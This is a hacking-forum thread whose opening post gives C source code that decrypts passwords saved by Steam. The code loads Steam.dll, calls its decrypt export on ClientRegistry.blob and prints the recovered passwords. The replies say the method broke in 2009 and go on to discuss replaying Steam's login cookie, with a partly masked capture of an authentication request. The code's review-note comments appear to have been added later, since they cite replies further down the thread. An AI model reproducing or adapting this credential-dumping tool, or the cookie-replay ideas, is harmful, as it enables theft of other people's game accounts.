counterstrikewi
Post subject: Aluigi's Steampwd converted to C++ [source code here] Posted: 09 May 2009 18:45 |
Have a look at this code. It decrypts the saved Steam passwords using Steam.dll. (I've added two functions and cleaned up the source.) If you want to learn something, this is your chance. Code: // DecryptStoredSteamPassword.c by wizard // // Combines Luigi's ClientRegistry.blob parsing function(s) // with VALVe's exported SteamDecryptDataForThisMachine() function // // small code changes and comments added by desxor // again some changes and functions were added by Five-Three-Nine
#include <stdio.h> #include <stdint.h> #include <string.h> #include <sys/stat.h> #include <windows.h>
/* Forward declarations for the helpers defined after main(). */
void GetSteamDic(char *Path);
void SteamParseEncryptedPassPhrase(uint8_t *fname);
uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str);

/*
 * Signature of Steam.dll's exported SteamDecryptDataForThisMachine, which
 * main() resolves at runtime with GetProcAddress(). Going by the single call
 * in SteamParseEncryptedPassPhrase() the arguments are (input, input length,
 * output buffer, output capacity, &output length) and 0 means success.
 * The names a..e are the original author's; that mapping is inferred from the
 * caller, not from any Valve documentation -- confirm before relying on it.
 */
typedef int (__cdecl *SteamDecryptDataForThisMachine_t)(char *a, int b, char *c, int d, int *e);
SteamDecryptDataForThisMachine_t SteamDecryptDataForThisMachine;
/*
 * main - entry point.
 *
 * Reads the Steam install path from the registry (GetSteamDic), derives the
 * Steam.dll, ClientRegistry.blob and SteamApps\* paths from it, loads
 * Steam.dll to resolve the exported SteamDecryptDataForThisMachine(), hands
 * the blob to SteamParseEncryptedPassPhrase(), unloads the DLL and finally
 * prints the directory names under SteamApps (minus "SourceMods"/"common").
 * argc/argv are unused. Returns 0; fatal conditions call exit(1).
 *
 * Historical note: a reply later in this thread quotes steampwd's notice that
 * from 29 Sep 2009 Steam no longer saves the password this way, so the
 * "Phrase" record this program looks for is absent from newer blobs.
 *
 * Review notes (not fixed here):
 *  - The four path buffers are fixed at 100 bytes. GetSteamDic() copies a
 *    registry value into SteamPath with no capacity passed, and the strcat()
 *    calls that append the suffixes are unbounded, so a long install path
 *    overflows them. snprintf() with sizeof would bound the composition.
 *  - `= {}` is the GCC/C23 empty initializer; `= {0}` is the C11 spelling.
 *  - FindFirstFile() can return INVALID_HANDLE_VALUE; wfd is then read and
 *    FindNextFile()/FindClose() are called on it without a check.
 *  - exit() is used although <stdlib.h> is not among the includes.
 *  - SteamBlob is char[] but SteamParseEncryptedPassPhrase() takes uint8_t*.
 */
int main(int argc, char *argv[])
{
    HANDLE hSteamDLL;

    /* Find Steam Dir */
    char SteamPath[100] = {};
    char SteamDll[100] = {};
    char SteamBlob[100] = {};
    char SteamUser[100] = {};
    GetSteamDic(SteamPath);
    strcat(SteamDll,SteamPath);
    strcat(SteamDll,"\\Steam.dll");
    strcat(SteamBlob,SteamPath);
    strcat(SteamBlob,"\\ClientRegistry.blob");
    strcat(SteamUser,SteamPath);
    strcat(SteamUser,"\\SteamApps\\*");
    printf("%s\n%s\n%s\n%s\n\n",SteamPath,SteamDll,SteamBlob,SteamUser);
    hSteamDLL = LoadLibrary(SteamDll);
    if(!hSteamDLL) {
        printf("\nError: the file STEAM.DLL has not been found.\n");
        exit(1);
    }
    /* the decrypt routine lives in Steam.dll; resolve it by name at runtime */
    SteamDecryptDataForThisMachine = (void *)GetProcAddress(hSteamDLL, "SteamDecryptDataForThisMachine");
    if(!SteamDecryptDataForThisMachine) {
        printf("\nError: the function SteamDecryptDataForThisMachine has not been found.\n");
        exit(1);
    }
    SteamParseEncryptedPassPhrase(SteamBlob);
    FreeLibrary(hSteamDLL);

    /* Addon: Find Steam Users -- every directory under SteamApps except
     * "SourceMods" and "common" is printed as a user name */
    printf("\nSteam User Names:\n");
    HANDLE fHandle;
    WIN32_FIND_DATA wfd;
    fHandle=FindFirstFile(SteamUser,&wfd);
    do {
        /* skip the "." and ".." entries */
        if (!( (wfd.cFileName[0]=='.') && ( (wfd.cFileName[1]=='.' && wfd.cFileName[2]==0) || wfd.cFileName[1]==0 ) )) {
            if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
                if((strcmp(wfd.cFileName,"SourceMods") != 0) && (strcmp(wfd.cFileName,"common") != 0)) {
                    printf("%s\n",wfd.cFileName);
                }
            }
        }
    } while (FindNextFile(fHandle,&wfd));
    FindClose(fHandle);
    return(0);
}
/*
 * SteamParseEncryptedPassPhrase - scan a ClientRegistry.blob image for
 * "Phrase\x01P" records and hand each record's payload to Steam.dll's
 * SteamDecryptDataForThisMachine() (resolved in main()).
 *
 * @fname: path of the blob file (declared uint8_t* but used as a C string).
 *
 * Exits the process if the file cannot be opened or no record is found at
 * all; frees the file image before returning. The decrypt export ties the
 * result to the machine the data was encrypted on (see the last message).
 *
 * Record layout, as the example dump below shows: an 8-byte marker padded to
 * 30 bytes, a uint16 `nlen`, a uint32 `len`, `nlen` bytes to skip, then
 * `len` bytes of payload.
 *
 * Review notes (not fixed here):
 *  - nlen and len come straight from the file and drive pointer arithmetic
 *    and an in-place write (`p[len] = 0`) without checking that
 *    p + 30 + 2 + 4 + nlen is still inside fdbuff; a truncated or crafted
 *    blob makes the nlen/len reads happen past the image before the
 *    `len < fdsize` test runs, and fdsize can go negative, which that test
 *    then masks rather than reports.
 *  - `*(uint16_t *)p` / `*(uint32_t *)p` are unaligned type-punning reads;
 *    memcpy() into a local is the portable form.
 *  - The fread() result is unchecked; `buff` is declared but never used;
 *    malloc()/free()/exit() are used without <stdlib.h> in the include list.
 *  - The fallback taken when the image cannot be allocated synthesises a
 *    record whose payload is the file name and runs it through the same
 *    parser; it reads as a layout self-test rather than recovery, and its
 *    own malloc() is unchecked.
 */
void SteamParseEncryptedPassPhrase(uint8_t *fname)
{
    int len, fdsize, pwds;
    uint16_t nlen;
    uint8_t *fdbuff, *fdnext, *p, *buff;
    char decpass[100];
    struct stat xstat;
    FILE *fd;

    fd = fopen(fname, "rb");
    if(!fd) {
        printf("Could not open %s for reading/memory search.\n", fname);
        exit(1);
    } else {
        fstat(fileno(fd), &xstat);
        fdbuff = malloc(xstat.st_size);
        if(!fdbuff) {
            printf("Could not allocate file into memory.\n");
            /* Fallback: build a synthetic record in the same layout the loop
             * below parses -- marker left-justified in 30 bytes, uint16
             * nlen = 0, uint32 len = strlen(fname), then fname as payload. */
            len = strlen(fname);
            fdsize = 64 + len;
            fdbuff = malloc(fdsize);
            p = fdbuff;
            /* "%-30s" pads the 8-byte "Phrase\x01P" marker to 30 bytes */
            p += sprintf(p, "%-30s", "\x50\x68\x72\x61\x73\x65\x01\x50");
            *(uint16_t *)p = 0; p += 2;
            *(uint32_t *)p = len; p += 4 + 0;
            strcpy(p, fname);
            fclose(fd);
            goto next;
        }
        /* load the whole file into memory for searching and reading */
        fread(fdbuff, 1, xstat.st_size, fd);
        fclose(fd);
        fdsize = xstat.st_size;
    }
next:
    fdnext = fdbuff;
    for(pwds = 0;; pwds++) {
        /* find_data() (Luigi A.'s helper) scans the remaining fdsize bytes
         * for the marker and returns its address, or NULL when absent */
        p = find_data(fdnext, fdsize, "\x50\x68\x72\x61\x73\x65\x01\x50");
        if(!p) {
            if(pwds) break;   /* at least one record was already handled */
            printf("An encrypted and stored password could not be located, exiting.\n");
            exit(1);
        }
        /* skip the 30-byte marker field (8 marker bytes plus padding) */
        p += 30;
        /* 16-bit count, per the original note: num = byte1 + (byte2 * 256) */
        nlen = *(uint16_t *)p;
        /* step over the 2 bytes just read */
        p += 2;
        /* 32-bit payload length; "5c 00 00 00" = 0x5c = 92 in the example */
        len = *(uint32_t *)p;
        /* step over the 4 bytes just read plus the nlen bytes the record
         * says to skip; p now points at the payload */
        p += 4 + nlen;
        /* an example of the data, provided by Luigi:
         * 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00 Phrase.P~.......
         * 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00 ................
         * 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36 \.......9AFABD96
         * 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32 20CEC491F83DCE12
         * 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46 633D9CDAADE0B6FF
         * 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39 A2BBE012E8927369
         * 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38 5257CDCE9572A708
         * 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33 8B2CAC037DC83363
         * 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63 3355..*...Cloc */
        fdsize -= (p - fdnext);
        fdnext = p;
        /* only decrypt when len is positive and fits in what is left of the image */
        if((len > 0) && (len < fdsize)) {
            /* terminate in place so %s and strlen() stop at the payload end */
            p[len] = 0;
            printf("Found stored encrypted password:\n \"%s\"\n\n", p);
            /* the export returns 0 on success; len is reused for the output length */
            if(!SteamDecryptDataForThisMachine(p, strlen(p), decpass, sizeof(decpass), &len)) {
                printf("Password: %.*s\n\n", len, decpass);
            } else {
                printf("Unable to decrypt the stored password, is this the same machine it was encrypted on?\n");
            }
        }
    }
    free(fdbuff);
}
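/*
 * find_data - locate the first occurrence of the NUL-terminated byte string
 * `str` inside the `buffsz`-byte region at `buff` (a bounded memmem()).
 *
 * @buff:   region to search; need not be NUL-terminated.
 * @buffsz: size of the region in bytes.
 * @str:    NUL-terminated pattern; its length is taken with strlen().
 *
 * Returns a pointer to the first match inside `buff`, or NULL when there is
 * none, when `buff` or `str` is NULL, when `buffsz` is negative, or when the
 * pattern is longer than the region. An empty pattern matches at `buff`.
 */
uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str)
{
    if (buff == NULL || str == NULL || buffsz < 0) {
        return NULL;
    }
    size_t strsz = strlen((const char *)str);
    size_t remaining = (size_t)buffsz;
    /* Guard before forming `buff + remaining - strsz`: a pattern longer than
     * the region would otherwise produce a limit pointer before `buff`, which
     * is undefined pointer arithmetic rather than merely an empty loop. */
    if (strsz > remaining) {
        return NULL;
    }
    uint8_t *limit = buff + (remaining - strsz);
    for (uint8_t *cur = buff; cur <= limit; cur++) {
        if (memcmp(cur, str, strsz) == 0) {
            return cur;
        }
    }
    return NULL;
}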
/*
 * GetSteamDic - copy the HKLM\Software\Valve\Steam "InstallPath" value into
 * Path.
 *
 * @Path: caller-supplied buffer; main() passes a 100-byte array.
 *
 * Review notes (not fixed here):
 *  - `size` is handed to RegQueryValueEx() uninitialised. It is an in/out
 *    parameter that must hold Path's capacity, so the copy is effectively
 *    unbounded; the function has no way to learn Path's size from its
 *    signature.
 *  - The RegOpenKey()/RegQueryValueEx() results are ignored; on failure Path
 *    keeps whatever the caller put in it (all zeros in main()) and hKey may
 *    be closed without having been opened.
 *  - Path is passed where the API expects a BYTE pointer (char* vs LPBYTE).
 */
void GetSteamDic(char *Path)
{
    HKEY hKey;
    DWORD size;

    RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Valve\\Steam", &hKey);
    RegQueryValueEx(hKey, "InstallPath", NULL, NULL, Path, &size);
    RegCloseKey(hKey);
}

peace counterstrikewi
diablosephiroth27
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 11 Oct 2009 12:52 |
Will
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 13 Sep 2010 20:48 |
Hello, I'm sorry for pushing this old thread but I can't find the text "Phrase" in the clientregistry.blob. I used a normal hex editor and IDA to find this "Phrase.P", .. nothing -.- Code: // an example of the data, provided by Luigi: // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00 Phrase.P~....... // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00 ................ // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36 \.......9AFABD96 // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32 20CEC491F83DCE12 // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46 633D9CDAADE0B6FF // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39 A2BBE012E8927369 // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38 5257CDCE9572A708 // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33 8B2CAC037DC83363 // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63 3355..*...Cloc
I want to learn that stuff, not just copy and paste this; could anyone help me please? Will
aluigi
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 13 Sep 2010 22:18 |
you don't find it because it no longer exists.
from the description of steampwd: "IMPORTANT NOTE: from the 29 Sep 2009 Steam no longer saves the full password so this tool is now totally useless."
Will
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 14 Sep 2010 09:31 |
Thanks !,
So the password won't be saved complete in one string by Steam.dll, but it's still complete in the ClientRegistry.blob, right?
Will
Sethioz
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 14 Sep 2010 15:30 |
NO, it does not exist like Luigi said.
Will
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 14 Sep 2010 21:33 |
Ok, thanks im sorry.
So if it doesn't exist, how can Steam remember the login data itself? It doesn't store the data in an SQL database, does it?
Will
Sethioz
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 14 Sep 2010 22:57 |
You were asking about the password, not the login data. Luigi has explained this somewhere in detail. Basically it works like a password hash: it uses the encrypted password to log in, which is not reversible; it can only be cracked using brute force or by guessing the word (wordlist attack). I can't remember what kind of protocol it used exactly, but that's the idea behind it.
im sure that only reason why you want this, is to plant a trojan into somebody's computer or go to your friend's place and steal their password. so in that case, you can steal their login info, which allows you to log into their account (if you are smart and know what to do), but you can not change password.
SomaFM
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 15 Sep 2010 00:36 |
Sethioz wrote: im sure that only reason why you want this, is to plant a trojan into somebody's computer or go to your friend's place and steal their password. so in that case, you can steal their login info, which allows you to log into their account (if you are smart and know what to do), but you can not change password. What proof do you have of that? Who cares what he does it for? There's no need to make assumptions and try to belittle him. Just answer his question and move along.
Will
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 15 Sep 2010 00:40 |
Thanks,
At first, i dont want to write any trojan. Im learning about cryptography and realy want to encrypt stuff by myself.
So that's bad news, that this kind of hash is not reversible; however, I trust you and give it up -.-
Bruteforcing i think will be detected by the Server anyway.
Thank you guys !
aluigi
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 15 Sep 2010 08:44 |
it's not really an hash, but just a cookie (also known as "ticket" probably) like those used to login on the forums via the browser
Will
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 15 Sep 2010 15:06 |
Thanks aluigi!
So when it works like a cookie it have to be stored clientside. So i have read some stuff about that and i know that the username is saved in an encryptet form as a registrykeyname in the ConnectCache.
Now to the value of this key: is this an encrypted form of the password to match with the "hash" server-side? Or is this value generated server-side after the first login and assigned to it? And finally, which function of the Steam.dll is responsible for it?
Thanks !!! , Will
aluigi
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 16 Sep 2010 08:20 |
the cookie is generated server-side, come on it's a cookie :)
for the function it's an internal one, I don't remember to have seen it exported by the dll
Will
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 17 Sep 2010 06:34 |
Yes, its a damn cookie (;
Thank you
Sethioz
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 17 Sep 2010 16:57 |
what is your goal ? reverse it ? crack it ? login using the "cookie" ?
Will
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 19 Sep 2010 13:48 |
What does my goal look like? A program which starts up and shows your own password, or logs in automatically.
How it will be done is pretty equal :)
"Reverse it" - is there something to reverse, its a cookie?!? "crack it" - like a bruteforce-attack, i think it would be the last way by everyone or not? "login using the cookie" - if its possible, why not ? :)
Thanks
Sethioz
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 19 Sep 2010 14:54 |
Quote: - A programm, which starts up and showing your own password or login automaticly.
password or login ? which one ? still confusing and what would be the possible purpose of this, if i can ask ?
obviously if you use the same "cookie" that steam, then you can login.
Will
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 19 Sep 2010 18:32 |
I??m sorry for my confusing english ;) The program have to show only the password. Or it have to login me, if its possible. You say if i use the same cookie as steam use, i can login.... The strings of a cookie are only visible by "sniffing" them, right ? Found this by using wireshark: Code: 0000 00 04 0e 47 b9 20 00 1a 4d 5b 30 a8 08 00 45 00 ...G. .. M[0...E. 0010 03 7f 69 e4 40 00 80 06 00 00 c0 a8 b2 16 3f e4 ..i.@... ......?. 0020 df 6e ce 86 00 50 76 93 68 4c 85 45 a5 f6 50 18 .n...Pv. hL.E..P. 0030 41 3a 95 83 00 00 50 4f 53 54 20 2f 49 53 74 65 A:....PO ST /ISte 0040 61 6d 55 73 65 72 41 75 74 68 2f 41 75 74 68 65 amUserAu th/Authe 0050 6e 74 69 63 61 74 65 55 73 65 72 2f 76 30 30 30 nticateU ser/v000 0060 31 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 63 6f 6e 1/ HTTP/ 1.1..con 0070 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 tent-typ e: appli 0080 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 cation/x -www-for 0090 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a 68 6f m-urlenc oded..ho 00a0 73 74 3a 20 61 70 69 2e 73 74 65 61 6d 70 6f 77 st: api. steampow 00b0 65 72 65 64 2e 63 6f 6d 0d 0a 41 63 63 65 70 74 ered.com ..Accept 00c0 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 2a 2f 2a 3b : text/h tml,*/*; 00d0 71 3d 30 2e 39 0d 0a 41 63 63 65 70 74 2d 45 6e q=0.9..A ccept-En 00e0 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 69 64 65 coding: gzip,ide 00f0 6e 74 69 74 79 2c 2a 3b 71 3d 30 0d 0a 41 63 63 ntity,*; q=0..Acc 0100 65 70 74 2d 43 68 61 72 73 65 74 3a 20 49 53 4f ept-Char set: ISO 0110 2d 38 38 35 39 2d 31 2c 75 74 66 2d 38 2c 2a 3b -8859-1, utf-8,*; 0120 71 3d 30 2e 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f q=0.7..C onnectio 0130 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 55 n: keep- alive..U 0140 73 65 72 2d 41 67 65 6e 74 3a 20 56 61 6c 76 65 ser-Agen t: Valve 0150 2f 53 74 65 61 6d 20 48 54 54 50 20 43 6c 69 65 /Steam H TTP Clie 0160 6e 74 20 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d nt 1.0.. 
Content- 0170 4c 65 6e 67 74 68 3a 20 35 32 36 0d 0a 0d 0a 66 Length: 526....f 0180 6f 72 6d 61 74 3d 76 64 66 26 73 74 65 61 6d 69 ormat=vd f&steami 0190 ************************************* d=****** ******** 01a0 35 32 30 26 73 65 73 73 69 6f 6e 6b 65 79 3d 34 ***&sess ionkey=* 01b0 25 41 35 25 42 37 50 25 34 30 25 35 45 6b 25 44 %**%***% **%***%* 01c0 39 *********** 38 25 33 45 25 41 41 7a 25 31 ****************** 01d0 41 4b 25 30 38 5f 25 43 37 25 45 45 25 46 46 25 AK%08_%C 7%EE%FF% 01e0 42 46 25 31 42 25 38 42 25 46 41 25 45 35 25 34 BF%1B%8B %FA%E5%4 01f0 30 25 44 39 25 32 33 2e 25 31 44 25 41 43 25 42 0%D9%23. %1D%AC%B 0200 31 69 6e 25 30 43 4c 25 44 36 4a 25 42 38 25 32 1in%0CL% D6J%B8%2 0210 34 2e 25 38 42 25 31 41 25 31 36 25 31 46 25 46 4.%8B%1A %16%1F%F 0220 35 77 25 38 37 25 38 36 25*******41 41 25 38 ******************** 0230 31 25 38 46 25 37 46 25 45 36 25 33 45 25 46 33 1%8F%7F% E6%3E%F3 0240 25 38 30 25 45 38 25 41 30 25 46 33 25 39 45 25 %80%E8%A 0%F3%9E% 0250 32 32 25 30 44 25 39 39 41 64 37 25 43 41 25 44 22%0D%99 Ad7%CA%D 0260 46 25 38 36 37 59 25 31 42 25 31 39 4a 44 6c 25 F%867Y%1 B%19JDl% 0270 32 33 25 37 45 25 43 35 25 39 37 25 45 37 25 46 23%7E%C5 %97%E7%F 0280 34 25 41 35 25 30 33 25 31 39 25 37 42 25 30 37 4%A5%03% 19%7B%07 0290 25 46 36 68 25 44 45 43 4a 25 35 45 25 43 30 25 %F6h%DEC J%5E%C0% 02a0 43 36 56 25 44 45 25 31 33 25 42 34 39 25 41 45 C6V%DE%1 3%B49%AE 02b0 25 30 45 25 39 31 25 42 31 25 42 36 25 42 38 25 %0E%91%B 1%B6%B8% 02c0 32 43 25 **********************2 33 25 45 ***************** 02d0 43 25 31 43 72 5a 25 41 37 66 25 43 43 25 43 46 C%1CrZ%A 7f%CC%CF 02e0 25 31 45 25 46 32 25 43 31 25 30 35 25 46 32 25 %1E%F2%C 1%05%F2% 02f0 43 37 25 38 45 26 65 6e 63 72 79 70 74 65 64 5f C7%8E&en crypted_ 0300 6c 6f 67 69 6e 6b 65 79 3d 25 43 32 25 32 37 25 loginkey =******* 0310 30 4**************1 25 38 44 25 38 30 25 45 ***************** 0320 30 64 25 46 31 25 45 39 65 25 46 34 25 43 42 25 0d%F1%E9 e%F4%CB% 0330 31 37 25 41 35 25 32 
32 25 41 45 25 32 35 25 43 17%A5%22 %AE%25%C 0340 36 25 32 38 25 45 41 25 39 35 25 38 38 25 41 31 6%28%EA% 95%88%A1 0350 59 25 39 46 25 39 39 25 33 44 6a 25 41 39 25 43 Y%9F%99% 3Dj%A9%C 0360 31 4e ************************38 35 25 32 ****************** 0370 .. .. .. . . . . . 0380 ...
And recieve this: Code: a uthentic 0040 61 74 65 75 73 65 72 22 0a 7b 0a 09 22 74 6f 6b ateuser" .{.."tok 0050 65 6e 22 09 22 37 36 35 36 31 31 39 37 39 38 34 en"."*** 61197*** ...
Am I on the right way? Thanks
Sethioz
Post subject: Re: Aluigi's Steampwd converted to C++ [source code here] Posted: 20 Sep 2010 17:49 |
As explained, you cannot show the password. Obviously you can log the user in, because the credentials are saved somewhere. Luigi has to answer you about that part.
i still do not understand, what is the purpose of this ? if you save credentials on steam, it logs you in automatically.